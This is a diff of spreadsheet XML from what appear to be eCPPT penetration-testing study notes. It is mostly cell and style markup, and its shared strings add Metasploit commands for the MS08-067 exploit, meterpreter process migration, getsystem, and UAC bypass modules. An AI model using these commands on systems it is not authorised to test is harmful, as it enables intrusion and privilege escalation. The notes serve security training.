-    <row r="42" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A42" s="22"/>
-      <c r="B42" s="22"/>
-      <c r="C42" s="22"/>
-      <c r="I42" s="25"/>
-    </row>
-    <row r="47" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="D47" s="23"/>
-    </row>
-    <row r="48" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A48" s="24"/>
-      <c r="D48" s="23"/>
+      <c r="B29" s="50"/>
+      <c r="C29" s="50"/>
+      <c r="D29" s="50"/>
+    </row>
+    <row r="30" spans="1:9" x14ac:dyDescent="0.25">
+      <c r="A30" s="51" t="s">
+        <v>447</v>
+      </c>
+      <c r="B30" s="51"/>
+      <c r="C30" s="51"/>
+      <c r="D30" s="51"/>
+    </row>
+    <row r="31" spans="1:9" x14ac:dyDescent="0.25">
+      <c r="A31" s="60" t="s">
+        <v>448</v>
+      </c>
+      <c r="B31" s="60"/>
+      <c r="C31" s="60"/>
+      <c r="I31" s="25"/>
+    </row>
+    <row r="32" spans="1:9" x14ac:dyDescent="0.25">
+      <c r="A32" s="40" t="s">
+        <v>450</v>
+      </c>
+      <c r="D32" s="40" t="s">
+        <v>451</v>
+      </c>
+    </row>
+    <row r="34" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A34" s="40" t="s">
+        <v>449</v>
+      </c>
+    </row>
+    <row r="35" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A35" s="24" t="s">
+        <v>453</v>
+      </c>
+    </row>
+    <row r="36" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A36" s="24" t="s">
+        <v>452</v>
+      </c>
+    </row>
+    <row r="37" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A37" s="24" t="s">
+        <v>454</v>
+      </c>
+      <c r="D37" s="24"/>
+    </row>
+    <row r="38" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A38" s="24" t="s">
+        <v>455</v>
+      </c>
+      <c r="D38" s="24"/>
+    </row>
+    <row r="39" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A39" s="24" t="s">
+        <v>457</v>
+      </c>
+      <c r="D39" s="24" t="s">
+        <v>459</v>
+      </c>
+    </row>
+    <row r="40" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A40" s="24" t="s">
+        <v>456</v>
+      </c>
+      <c r="D40" s="24" t="s">
+        <v>461</v>
+      </c>
+    </row>
+    <row r="41" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A41" s="24" t="s">
+        <v>352</v>
+      </c>
+      <c r="D41" s="24" t="s">
+        <v>462</v>
+      </c>
+    </row>
+    <row r="42" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A42" s="24" t="s">
+        <v>458</v>
+      </c>
+      <c r="D42" s="24" t="s">
+        <v>463</v>
+      </c>
+    </row>
+    <row r="43" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A43" s="24" t="s">
+        <v>464</v>
+      </c>
+      <c r="D43" s="24" t="s">
+        <v>466</v>
+      </c>
+    </row>
+    <row r="44" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A44" s="24" t="s">
+        <v>465</v>
+      </c>
+      <c r="D44" s="24" t="s">
+        <v>467</v>
+      </c>
+    </row>
+    <row r="45" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A45" s="24" t="s">
+        <v>460</v>
+      </c>
+    </row>
+    <row r="46" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A46" s="61" t="s">
+        <v>468</v>
+      </c>
+      <c r="B46" s="61"/>
+      <c r="C46" s="61"/>
+      <c r="D46" s="61"/>
+    </row>
+    <row r="47" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A47" s="40" t="s">
+        <v>469</v>
+      </c>
+    </row>
+    <row r="48" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A48" s="62"/>
+      <c r="B48" s="62"/>
+      <c r="C48" s="62"/>
+      <c r="D48" s="62"/>
+    </row>
+    <row r="49" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A49" s="40" t="s">
+        <v>470</v>
+      </c>
+      <c r="D49" s="40" t="s">
+        <v>476</v>
+      </c>
     </row>
     <row r="50" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A50" s="38"/>
-      <c r="B50" s="38"/>
-      <c r="C50" s="38"/>
-      <c r="D50" s="38"/>
+      <c r="A50" s="40" t="s">
+        <v>471</v>
+      </c>
+      <c r="D50" s="40" t="s">
+        <v>477</v>
+      </c>
+    </row>
+    <row r="51" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A51" s="40" t="s">
+        <v>472</v>
+      </c>
+      <c r="D51" s="40" t="s">
+        <v>478</v>
+      </c>
     </row>
     <row r="52" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A52" s="34"/>
-      <c r="B52" s="34"/>
-      <c r="C52" s="34"/>
-      <c r="D52" s="34"/>
+      <c r="A52" s="40" t="s">
+        <v>473</v>
+      </c>
+      <c r="D52" s="40" t="s">
+        <v>479</v>
+      </c>
+    </row>
+    <row r="53" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A53" s="40" t="s">
+        <v>474</v>
+      </c>
+      <c r="D53" s="40" t="s">
+        <v>480</v>
+      </c>
+    </row>
+    <row r="54" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A54" s="40" t="s">
+        <v>475</v>
+      </c>
+      <c r="D54" s="40" t="s">
+        <v>481</v>
+      </c>
+    </row>
+    <row r="56" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A56" s="61" t="s">
+        <v>482</v>
+      </c>
+      <c r="B56" s="61"/>
+      <c r="C56" s="61"/>
+      <c r="D56" s="61"/>
+    </row>
+    <row r="57" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A57" s="40" t="s">
+        <v>485</v>
+      </c>
+    </row>
+    <row r="59" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A59" s="24" t="s">
+        <v>483</v>
+      </c>
+      <c r="D59" s="40" t="s">
+        <v>484</v>
+      </c>
     </row>
     <row r="60" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A60" s="38"/>
-      <c r="B60" s="38"/>
-      <c r="C60" s="38"/>
-      <c r="D60" s="38"/>
-    </row>
-    <row r="65" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A65" s="38"/>
-      <c r="B65" s="38"/>
-      <c r="C65" s="38"/>
-      <c r="D65" s="38"/>
-    </row>
-    <row r="72" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A72" s="38"/>
-      <c r="B72" s="38"/>
-      <c r="C72" s="38"/>
-      <c r="D72" s="38"/>
-    </row>
-    <row r="74" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A74" s="25"/>
-      <c r="B74" s="25"/>
-      <c r="C74" s="25"/>
-      <c r="D74" s="25"/>
-    </row>
-    <row r="75" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A75" s="25"/>
-      <c r="B75" s="25"/>
-      <c r="C75" s="25"/>
-      <c r="D75" s="25"/>
-    </row>
-    <row r="76" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A76" s="25"/>
-      <c r="B76" s="25"/>
-      <c r="C76" s="25"/>
-      <c r="D76" s="25"/>
-    </row>
-    <row r="77" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A77" s="25"/>
-      <c r="B77" s="25"/>
-      <c r="C77" s="25"/>
-      <c r="D77" s="25"/>
-    </row>
-    <row r="78" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A78" s="37"/>
-      <c r="B78" s="37"/>
-      <c r="C78" s="37"/>
-      <c r="D78" s="37"/>
-    </row>
-    <row r="79" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A79" s="25"/>
-      <c r="B79" s="25"/>
-      <c r="C79" s="25"/>
-      <c r="D79" s="25"/>
-    </row>
-    <row r="80" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A80" s="25"/>
-      <c r="B80" s="25"/>
-      <c r="C80" s="25"/>
-      <c r="D80" s="25"/>
+      <c r="A60" s="1"/>
+      <c r="B60" s="1"/>
+      <c r="C60" s="1"/>
+      <c r="D60" s="1"/>
+    </row>
+    <row r="61" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A61" s="61" t="s">
+        <v>486</v>
+      </c>
+      <c r="B61" s="61"/>
+      <c r="C61" s="61"/>
+      <c r="D61" s="61"/>
+    </row>
+    <row r="62" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A62" s="40" t="s">
+        <v>487</v>
+      </c>
+      <c r="D62" s="40" t="s">
+        <v>488</v>
+      </c>
+    </row>
+    <row r="63" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A63" s="40" t="s">
+        <v>489</v>
+      </c>
+      <c r="D63" s="40" t="s">
+        <v>490</v>
+      </c>
+    </row>
+    <row r="65" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A65" s="24" t="s">
+        <v>491</v>
+      </c>
+      <c r="D65" s="40" t="s">
+        <v>492</v>
+      </c>
+    </row>
+    <row r="68" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A68" s="61" t="s">
+        <v>493</v>
+      </c>
+      <c r="B68" s="61"/>
+      <c r="C68" s="61"/>
+      <c r="D68" s="61"/>
+    </row>
+    <row r="69" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A69" s="40" t="s">
+        <v>494</v>
+      </c>
+      <c r="D69" s="40" t="s">
+        <v>495</v>
+      </c>
+    </row>
+    <row r="70" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A70" s="58"/>
+      <c r="B70" s="58"/>
+      <c r="C70" s="58"/>
+      <c r="D70" s="58"/>
+    </row>
+    <row r="71" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A71" s="61" t="s">
+        <v>415</v>
+      </c>
+      <c r="B71" s="61"/>
+      <c r="C71" s="61"/>
+      <c r="D71" s="61"/>
+    </row>
+    <row r="72" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A72" s="58" t="s">
+        <v>496</v>
+      </c>
+      <c r="B72" s="58"/>
+      <c r="C72" s="58"/>
+      <c r="D72" s="58" t="s">
+        <v>497</v>
+      </c>
+    </row>
+    <row r="73" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A73" s="58"/>
+      <c r="B73" s="58"/>
+      <c r="C73" s="58"/>
+      <c r="D73" s="58"/>
+    </row>
+    <row r="74" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A74" s="61" t="s">
+        <v>423</v>
+      </c>
+      <c r="B74" s="61"/>
+      <c r="C74" s="61"/>
+      <c r="D74" s="61"/>
+    </row>
+    <row r="75" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A75" s="58" t="s">
+        <v>498</v>
+      </c>
+      <c r="B75" s="58"/>
+      <c r="C75" s="58"/>
+      <c r="D75" s="58"/>
+    </row>
+    <row r="76" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A76" s="58" t="s">
+        <v>499</v>
+      </c>
+      <c r="B76" s="58"/>
+      <c r="C76" s="58"/>
+      <c r="D76" s="58"/>
+      <c r="F76" s="58" t="s">
+        <v>506</v>
+      </c>
+    </row>
+    <row r="77" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A77" s="58" t="s">
+        <v>500</v>
+      </c>
+      <c r="B77" s="58"/>
+      <c r="C77" s="58"/>
+      <c r="D77" s="58"/>
+      <c r="F77" s="1" t="s">
+        <v>511</v>
+      </c>
+    </row>
+    <row r="78" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A78" s="58" t="s">
+        <v>501</v>
+      </c>
+      <c r="B78" s="58"/>
+      <c r="C78" s="58"/>
+      <c r="D78" s="58" t="s">
+        <v>502</v>
+      </c>
+      <c r="F78" s="1" t="s">
+        <v>509</v>
+      </c>
+    </row>
+    <row r="79" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A79" s="58" t="s">
+        <v>503</v>
+      </c>
+      <c r="B79" s="58"/>
+      <c r="C79" s="58"/>
+      <c r="D79" s="58" t="s">
+        <v>506</v>
+      </c>
+    </row>
+    <row r="80" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A80" s="1" t="s">
+        <v>504</v>
+      </c>
+      <c r="B80" s="58"/>
+      <c r="C80" s="58"/>
+      <c r="D80" s="59" t="s">
+        <v>505</v>
+      </c>
     </row>
     <row r="81" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A81" s="25"/>
-      <c r="B81" s="25"/>
-      <c r="C81" s="25"/>
-      <c r="D81" s="25"/>
+      <c r="A81" s="1" t="s">
+        <v>507</v>
+      </c>
+      <c r="B81" s="58"/>
+      <c r="C81" s="58"/>
+      <c r="D81" s="58" t="s">
+        <v>508</v>
+      </c>
     </row>
     <row r="82" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A82" s="37"/>
-      <c r="B82" s="37"/>
-      <c r="C82" s="37"/>
-      <c r="D82" s="37"/>
+      <c r="A82" s="1" t="s">
+        <v>510</v>
+      </c>
+      <c r="B82" s="58"/>
+      <c r="C82" s="58"/>
+      <c r="D82" s="58" t="s">
+        <v>513</v>
+      </c>
     </row>
     <row r="83" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A83" s="25"/>
-      <c r="B83" s="25"/>
-      <c r="C83" s="25"/>
-      <c r="D83" s="25"/>
+      <c r="A83" s="58" t="s">
+        <v>512</v>
+      </c>
+      <c r="B83" s="58"/>
+      <c r="C83" s="58"/>
+      <c r="D83" s="58" t="s">
+        <v>514</v>
+      </c>
     </row>
     <row r="84" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A84" s="25"/>
-      <c r="B84" s="25"/>
-      <c r="C84" s="25"/>
-      <c r="D84" s="25"/>
+      <c r="A84" s="61" t="s">
+        <v>430</v>
+      </c>
+      <c r="B84" s="61"/>
+      <c r="C84" s="61"/>
+      <c r="D84" s="61"/>
     </row>
     <row r="85" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A85" s="25"/>
-      <c r="B85" s="25"/>
-      <c r="C85" s="25"/>
-      <c r="D85" s="25"/>
+      <c r="A85" s="1" t="s">
+        <v>515</v>
+      </c>
+      <c r="B85" s="58"/>
+      <c r="C85" s="58"/>
+      <c r="D85" s="58"/>
     </row>
     <row r="86" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A86" s="37"/>
-      <c r="B86" s="37"/>
-      <c r="C86" s="37"/>
-      <c r="D86" s="37"/>
+      <c r="A86" s="58" t="s">
+        <v>516</v>
+      </c>
+      <c r="B86" s="58"/>
+      <c r="C86" s="58"/>
+      <c r="D86" s="58" t="s">
+        <v>517</v>
+      </c>
     </row>
     <row r="87" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A87" s="25"/>
-      <c r="B87" s="25"/>
-      <c r="C87" s="25"/>
-      <c r="D87" s="25"/>
+      <c r="A87" s="58"/>
+      <c r="B87" s="58"/>
+      <c r="C87" s="58"/>
+      <c r="D87" s="58"/>
     </row>
     <row r="88" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A88" s="25"/>
-      <c r="B88" s="25"/>
-      <c r="C88" s="25"/>
-      <c r="D88" s="25"/>
+      <c r="A88" s="61" t="s">
+        <v>433</v>
+      </c>
+      <c r="B88" s="61"/>
+      <c r="C88" s="61"/>
+      <c r="D88" s="61"/>
     </row>
     <row r="89" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A89" s="25"/>
-      <c r="B89" s="25"/>
-      <c r="C89" s="25"/>
-      <c r="D89" s="25"/>
+      <c r="A89" s="58" t="s">
+        <v>518</v>
+      </c>
+      <c r="B89" s="58"/>
+      <c r="C89" s="58"/>
+      <c r="D89" s="58" t="s">
+        <v>519</v>
+      </c>
     </row>
     <row r="90" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A90" s="37"/>
-      <c r="B90" s="37"/>
-      <c r="C90" s="37"/>
-      <c r="D90" s="37"/>
+      <c r="A90" s="58" t="s">
+        <v>523</v>
+      </c>
+      <c r="B90" s="58"/>
+      <c r="C90" s="58"/>
+      <c r="D90" s="58" t="s">
+        <v>521</v>
+      </c>
     </row>
     <row r="91" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A91" s="25"/>
-      <c r="B91" s="25"/>
-      <c r="C91" s="25"/>
-      <c r="D91" s="25"/>
+      <c r="A91" s="58" t="s">
+        <v>524</v>
+      </c>
+      <c r="B91" s="58"/>
+      <c r="C91" s="58"/>
+      <c r="D91" s="58"/>
     </row>
     <row r="92" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A92" s="25"/>
-      <c r="B92" s="25"/>
-      <c r="C92" s="25"/>
-      <c r="D92" s="25"/>
+      <c r="A92" s="58" t="s">
+        <v>520</v>
+      </c>
+      <c r="B92" s="58"/>
+      <c r="C92" s="58"/>
+      <c r="D92" s="58" t="s">
+        <v>522</v>
+      </c>
     </row>
     <row r="93" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A93" s="25"/>
-      <c r="B93" s="25"/>
-      <c r="C93" s="25"/>
-      <c r="D93" s="25"/>
+      <c r="A93" s="61" t="s">
+        <v>444</v>
+      </c>
+      <c r="B93" s="61"/>
+      <c r="C93" s="61"/>
+      <c r="D93" s="61"/>
+    </row>
+    <row r="94" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A94" s="58" t="s">
+        <v>525</v>
+      </c>
+      <c r="B94" s="58"/>
+      <c r="C94" s="58"/>
+      <c r="D94" s="58"/>
+    </row>
+    <row r="95" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A95" s="58" t="s">
+        <v>526</v>
+      </c>
+      <c r="B95" s="58"/>
+      <c r="C95" s="58"/>
+      <c r="D95" s="58"/>
+    </row>
+    <row r="96" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A96" s="58" t="s">
+        <v>527</v>
+      </c>
+      <c r="B96" s="58"/>
+      <c r="C96" s="58"/>
+      <c r="D96" s="58"/>
+    </row>
+    <row r="97" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A97" s="40" t="s">
+        <v>528</v>
+      </c>
+    </row>
+    <row r="98" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A98" s="61" t="s">
+        <v>420</v>
+      </c>
+      <c r="B98" s="61"/>
+      <c r="C98" s="61"/>
+      <c r="D98" s="61"/>
+    </row>
+    <row r="99" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A99" s="40" t="s">
+        <v>529</v>
+      </c>
+      <c r="D99" s="40" t="s">
+        <v>530</v>
+      </c>
+    </row>
+    <row r="100" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A100" s="40" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="101" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A101" s="40" t="s">
+        <v>531</v>
+      </c>
     </row>
   </sheetData>
-  <mergeCells count="11">
+  <mergeCells count="13">
+    <mergeCell ref="A98:D98"/>
+    <mergeCell ref="A88:D88"/>
+    <mergeCell ref="A93:D93"/>
+    <mergeCell ref="A74:D74"/>
+    <mergeCell ref="A68:D68"/>
+    <mergeCell ref="A30:D30"/>
+    <mergeCell ref="A84:D84"/>
+    <mergeCell ref="A71:D71"/>
     <mergeCell ref="A1:D1"/>
-    <mergeCell ref="A40:D40"/>
-    <mergeCell ref="A50:D50"/>
-    <mergeCell ref="A60:D60"/>
-    <mergeCell ref="A65:D65"/>
-    <mergeCell ref="A86:D86"/>
-    <mergeCell ref="A90:D90"/>
-    <mergeCell ref="A78:D78"/>
-    <mergeCell ref="A72:D72"/>
-    <mergeCell ref="A41:D41"/>
-    <mergeCell ref="A82:D82"/>
+    <mergeCell ref="A29:D29"/>
+    <mergeCell ref="A46:D46"/>
+    <mergeCell ref="A56:D56"/>
+    <mergeCell ref="A61:D61"/>
   </mergeCells>
+  <hyperlinks>
+    <hyperlink ref="D4" r:id="rId1" xr:uid="{E4F04A35-AC64-4F5A-9A40-07842136CB07}"/>
+    <hyperlink ref="D5" r:id="rId2" xr:uid="{0F282883-6ACC-423B-BF34-F8C88E4CA73C}"/>
+  </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>
 </file>
@@ -4581,12 +6219,12 @@
   </cols>
   <sheetData>
     <row r="1" spans="1:9" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A1" s="39" t="s">
+      <c r="A1" s="49" t="s">
         <v>0</v>
       </c>
-      <c r="B1" s="39"/>
-      <c r="C1" s="39"/>
-      <c r="D1" s="39"/>
+      <c r="B1" s="49"/>
+      <c r="C1" s="49"/>
+      <c r="D1" s="49"/>
     </row>
     <row r="2" spans="1:9" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A2" s="3" t="s">
@@ -4829,18 +6467,18 @@
       <c r="D38" s="15"/>
     </row>
     <row r="40" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A40" s="40" t="s">
+      <c r="A40" s="50" t="s">
         <v>68</v>
       </c>
-      <c r="B40" s="40"/>
-      <c r="C40" s="40"/>
-      <c r="D40" s="40"/>
+      <c r="B40" s="50"/>
+      <c r="C40" s="50"/>
+      <c r="D40" s="50"/>
     </row>
     <row r="41" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A41" s="38"/>
-      <c r="B41" s="38"/>
-      <c r="C41" s="38"/>
-      <c r="D41" s="38"/>
+      <c r="A41" s="51"/>
+      <c r="B41" s="51"/>
+      <c r="C41" s="51"/>
+      <c r="D41" s="51"/>
     </row>
     <row r="42" spans="1:9" x14ac:dyDescent="0.25">
       <c r="A42" s="22"/>
@@ -4856,10 +6494,10 @@
       <c r="D48" s="23"/>
     </row>
     <row r="50" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A50" s="38"/>
-      <c r="B50" s="38"/>
-      <c r="C50" s="38"/>
-      <c r="D50" s="38"/>
+      <c r="A50" s="51"/>
+      <c r="B50" s="51"/>
+      <c r="C50" s="51"/>
+      <c r="D50" s="51"/>
     </row>
     <row r="52" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A52" s="34"/>
@@ -4868,22 +6506,22 @@
       <c r="D52" s="34"/>
     </row>
     <row r="60" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A60" s="38"/>
-      <c r="B60" s="38"/>
-      <c r="C60" s="38"/>
-      <c r="D60" s="38"/>
+      <c r="A60" s="51"/>
+      <c r="B60" s="51"/>
+      <c r="C60" s="51"/>
+      <c r="D60" s="51"/>
     </row>
     <row r="65" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A65" s="38"/>
-      <c r="B65" s="38"/>
-      <c r="C65" s="38"/>
-      <c r="D65" s="38"/>
+      <c r="A65" s="51"/>
+      <c r="B65" s="51"/>
+      <c r="C65" s="51"/>
+      <c r="D65" s="51"/>
     </row>
     <row r="72" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A72" s="38"/>
-      <c r="B72" s="38"/>
-      <c r="C72" s="38"/>
-      <c r="D72" s="38"/>
+      <c r="A72" s="51"/>
+      <c r="B72" s="51"/>
+      <c r="C72" s="51"/>
+      <c r="D72" s="51"/>
     </row>
     <row r="74" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A74" s="25"/>
@@ -4910,10 +6548,10 @@
       <c r="D77" s="25"/>
     </row>
     <row r="78" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A78" s="37"/>
-      <c r="B78" s="37"/>
-      <c r="C78" s="37"/>
-      <c r="D78" s="37"/>
+      <c r="A78" s="52"/>
+      <c r="B78" s="52"/>
+      <c r="C78" s="52"/>
+      <c r="D78" s="52"/>
     </row>
     <row r="79" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A79" s="25"/>
@@ -4934,10 +6572,10 @@
       <c r="D81" s="25"/>
     </row>
     <row r="82" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A82" s="37"/>
-      <c r="B82" s="37"/>
-      <c r="C82" s="37"/>
-      <c r="D82" s="37"/>
+      <c r="A82" s="52"/>
+      <c r="B82" s="52"/>
+      <c r="C82" s="52"/>
+      <c r="D82" s="52"/>
     </row>
     <row r="83" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A83" s="25"/>
@@ -4958,10 +6596,10 @@
       <c r="D85" s="25"/>
     </row>
     <row r="86" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A86" s="37"/>
-      <c r="B86" s="37"/>
-      <c r="C86" s="37"/>
-      <c r="D86" s="37"/>
+      <c r="A86" s="52"/>
+      <c r="B86" s="52"/>
+      <c r="C86" s="52"/>
+      <c r="D86" s="52"/>
     </row>
     <row r="87" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A87" s="25"/>
@@ -4982,10 +6620,10 @@
       <c r="D89" s="25"/>
     </row>
     <row r="90" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A90" s="37"/>
-      <c r="B90" s="37"/>
-      <c r="C90" s="37"/>
-      <c r="D90" s="37"/>
+      <c r="A90" s="52"/>
+      <c r="B90" s="52"/>
+      <c r="C90" s="52"/>
+      <c r="D90" s="52"/>
     </row>
     <row r="91" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A91" s="25"/>
@@ -5007,17 +6645,17 @@
     </row>
   </sheetData>
   <mergeCells count="11">
-    <mergeCell ref="A1:D1"/>
-    <mergeCell ref="A40:D40"/>
-    <mergeCell ref="A50:D50"/>
-    <mergeCell ref="A60:D60"/>
-    <mergeCell ref="A65:D65"/>
     <mergeCell ref="A86:D86"/>
     <mergeCell ref="A90:D90"/>
     <mergeCell ref="A78:D78"/>
     <mergeCell ref="A72:D72"/>
     <mergeCell ref="A41:D41"/>
     <mergeCell ref="A82:D82"/>
+    <mergeCell ref="A1:D1"/>
+    <mergeCell ref="A40:D40"/>
+    <mergeCell ref="A50:D50"/>
+    <mergeCell ref="A60:D60"/>
+    <mergeCell ref="A65:D65"/>
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
   <pageSetup orientation="portrait" r:id="rId1"/>

</xml_diff>

<commit_message>
Add about 1/2 Post Enumeration
</commit_message>
<xml_diff>
--- a/ECPPT/network-security/Tools-List.xlsx
+++ b/ECPPT/network-security/Tools-List.xlsx
@@ -1,16 +1,16 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="20827"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="21001"/>
   <workbookPr defaultThemeVersion="166925"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\Workbench\ecppt-notes-master\ECPPT\network-security\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{077FC78B-CEDD-403E-B6AB-F6064C2A3E6D}" xr6:coauthVersionLast="37" xr6:coauthVersionMax="37" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BAADFB05-E0D7-455A-AD75-485DE9A52E33}" xr6:coauthVersionLast="38" xr6:coauthVersionMax="38" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="0" windowWidth="20400" windowHeight="8130" tabRatio="893" firstSheet="3" activeTab="4" xr2:uid="{FAAFF2C1-7EB6-464B-8383-4BCAECFF30B1}"/>
+    <workbookView xWindow="0" yWindow="0" windowWidth="20400" windowHeight="8130" tabRatio="893" firstSheet="3" activeTab="5" xr2:uid="{FAAFF2C1-7EB6-464B-8383-4BCAECFF30B1}"/>
   </bookViews>
   <sheets>
     <sheet name="Information Gain" sheetId="1" r:id="rId1"/>
@@ -30,7 +30,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="657" uniqueCount="533">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="802" uniqueCount="659">
   <si>
     <t>Tools List</t>
   </si>
@@ -1629,6 +1629,384 @@
   </si>
   <si>
     <t>msf &gt; use exploit/windows/smb/ms08_067_netapi</t>
+  </si>
+  <si>
+    <t>meterpreter sysinfo</t>
+  </si>
+  <si>
+    <t>meterpreter get pid</t>
+  </si>
+  <si>
+    <t>migrate</t>
+  </si>
+  <si>
+    <t>Change from one pid number to another</t>
+  </si>
+  <si>
+    <t>getsystem</t>
+  </si>
+  <si>
+    <t>exploit/[OS]/local</t>
+  </si>
+  <si>
+    <t>bypassuac</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; run post/windows/gather/win_privs</t>
+  </si>
+  <si>
+    <t>msf exploit(handler) &gt; search bypassuac</t>
+  </si>
+  <si>
+    <t>msf exploit(handler) &gt; user exploit/windows/local/bypassuac_vbs</t>
